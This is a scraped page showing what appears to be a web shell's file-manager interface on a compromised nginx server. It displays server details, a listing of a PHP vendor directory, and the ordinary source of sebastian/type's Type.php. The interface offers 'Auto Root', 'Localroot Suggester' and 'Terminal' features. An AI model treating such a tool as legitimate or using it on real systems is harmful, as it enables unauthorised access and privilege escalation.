Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.44
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
1 /
vendor /
sebastian /
type /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
exception
[ DIR ]
drwxr-xr-x
2020-11-17 16:24
CallableType.php
4.4
KB
-rw-r--r--
2020-11-17 16:24
GenericObjectType.php
986
B
-rw-r--r--
2020-11-17 16:24
IterableType.php
1.58
KB
-rw-r--r--
2020-11-17 16:24
NullType.php
603
B
-rw-r--r--
2020-11-17 16:24
ObjectType.php
1.47
KB
-rw-r--r--
2020-11-17 16:24
SimpleType.php
1.71
KB
-rw-r--r--
2020-11-17 16:24
Type.php
2
KB
-rw-r--r--
2020-11-17 16:24
TypeName.php
1.77
KB
-rw-r--r--
2020-11-17 16:24
UnknownType.php
581
B
-rw-r--r--
2020-11-17 16:24
VoidType.php
603
B
-rw-r--r--
2020-11-17 16:24
Save
Rename
<?php declare(strict_types=1); /* * This file is part of sebastian/type. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace SebastianBergmann\Type; abstract class Type { public static function fromValue($value, bool $allowsNull): self { $typeName = \gettype($value); if ($typeName === 'object') { return new ObjectType(TypeName::fromQualifiedName(\get_class($value)), $allowsNull); } $type = self::fromName($typeName, $allowsNull); if ($type instanceof SimpleType) { $type = new SimpleType($typeName, $allowsNull, $value); } return $type; } public static function fromName(string $typeName, bool $allowsNull): self { switch (\strtolower($typeName)) { case 'callable': return new CallableType($allowsNull); case 'iterable': return new IterableType($allowsNull); case 'null': return new NullType; case 'object': return new GenericObjectType($allowsNull); case 'unknown type': return new UnknownType; case 'void': return new VoidType; case 'array': case 'bool': case 'boolean': case 'double': case 'float': case 'int': case 'integer': case 'real': case 'resource': case 'resource (closed)': case 'string': return new SimpleType($typeName, $allowsNull); default: return new ObjectType(TypeName::fromQualifiedName($typeName), $allowsNull); } } abstract public function isAssignable(Type $other): bool; abstract public function getReturnTypeDeclaration(): string; abstract public function allowsNull(): bool; }